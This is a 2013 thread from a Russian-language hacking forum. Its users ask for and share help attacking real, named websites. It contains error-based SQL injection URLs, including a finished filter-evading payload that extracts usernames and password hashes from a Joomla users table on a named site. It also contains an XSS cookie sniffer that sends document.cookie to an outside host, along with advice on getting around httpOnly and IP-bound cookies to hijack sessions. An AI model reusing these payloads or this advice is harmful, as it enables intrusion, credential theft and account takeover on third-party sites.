ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.05.2013, 18:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
1891
Репутация:
0
|
|
помогите плз допилить.
Код:
Code:
http://wylsacom.planetiphone.ru/blog.php?page=-1 or 1=1 and (select 1 and row(1,1)>(select version(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
но нехочет выводить ничего( |
|
|
|
11.05.2013, 14:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании ">alert('XSS') всё выполняеться успешно пробую подставить снифер
img = new Image();
img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie;
Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent
Подскажите что не правильно делаю?
|
|
|
|
11.05.2013, 18:13
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Sat-hacker
Sat-hacker said:
Решил впервые заняться xss,попался форум vbulletin,
...
Подскажите что не правильно делаю?
На vB при некоторых настройках куки привязаны к ip и разумеется всегда httpOnly.
Если удалось получить XSS, нужно её сразу использовать для совершения необходимых действий или найти возможность получения куков другим способом, записать юзер-агент и заходить под IP из той-же подсети.
Вы определитесь, что вам собственно нужно сделать и для чего.
|
|
|
11.05.2013, 18:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
XAMEHA проверял на виртуалке,ip одинаковый,использовал сразу.Хз мож снифер другой попробовать?
|
|
|
|
11.05.2013, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Вопрос по XSS
Имеется site1.com.
Так же есть XSS вида alert() (т.е нет фильтрации символов) на site2.com
site1.com грузит через iframe site2.com.
Можно ли получить куки пользователя сайта site1.com используя XSS site2.com ??
Спасибо
|
|
|
|
12.05.2013, 04:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от WendM
WendM said:
Вопрос по XSS
Имеется
site1.com
.
Так же есть XSS вида
alert()
(т.е нет фильтрации символов)
на
site2.com
site1.com
грузит через iframe
site2.com
.
Можно ли получить куки пользователя сайта
site1.com
используя XSS
site2.com
??
Спасибо
нет нельзя. политика безопасности современных браузеров жестока)
А у меня такой вопрос... как происходит восстановление пароля на drupal 6? Если послать запрос на ретрив - пишется куда-нибудь токен?
На сайте рега модерируемая, не глянуть, а двиг скачать пока не позволяет инет лагающий
подскажите?
|
|
|
|
12.05.2013, 04:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Можно ли как-нибудь обойти подстановку дефисов в '
[/CODE]
В итоге в конце страницы появляется
Код, соотв., не выполняется. Это возможно обойти?
Ну и ещё один вопрос - можно ли как-то выяснить оригинальный путь сохранения изображений? Заливаешь, к примеру, abc.php.jpg, а отображается какой-нибудь 1651656541854541.jpg |
|
|
|
12.05.2013, 21:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
|
|
|
|
13.05.2013, 15:52
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Vip77
Vip77 said:
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
В первую очередь, обратил бы ты внимание на то, что фильтрация SLECT & UNION - это вторичное. А первичное - это то, что фильтруется также кавычка, собвственно деформирующая запрос. И пока ты не найдешь способ обойти сей момент, можешь не волноваться по поводу фильтрации всего остального.
|
|
|
|
13.05.2013, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Vip77
Vip77 said:
_http://vkontakte.dj/index.php?option=com_fireboard&Go=1' (смотреть в хроме)
Как раскрутить? Фильтрует union и select.
немного ошибся, фильтруется +
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'or(seLEct*from (seLEct(name_const(veRsion(),1)),name_const(veRsio n(),1))a)and(1)='1
В общем сам добил
username
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/username/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
password
Сообщение от None
http://vkontakte.dj/index.php?option=com_fireboard&Go=1'/**/or/**/(seLEct/**/count(*)from(seLEct/**/1/**/uNIon/**/seLEct/**/2/**/uNIon/**/seLEct/**/3)x/**/group/**/by/**/concat(mid((seLEct/**/password/**/from/**/jos_users/**/limit/**/1,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Пробелы убрать не забудь
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
